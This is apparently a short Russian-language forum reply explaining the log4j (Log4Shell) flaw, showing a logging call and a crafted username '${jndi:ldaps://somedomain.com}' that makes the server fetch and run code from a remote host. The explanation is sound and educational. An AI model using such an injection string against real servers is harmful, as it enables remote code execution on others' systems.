Ты что-то не то читаешь. Суть уязвимости с log4j была в том, что ты пишешь в программе
logger.info("User {} logged in", user.name);. Пользователь регистрируется со специальным именем
${jndi:ldaps://somedomain.com} и твой сервер загружает и выполняет определённый код с somedomain.com.
Наверное ты про какие-то другие уязвимости читаешь, менее важные. Там как начали в него пристально глядеть, много повылазило.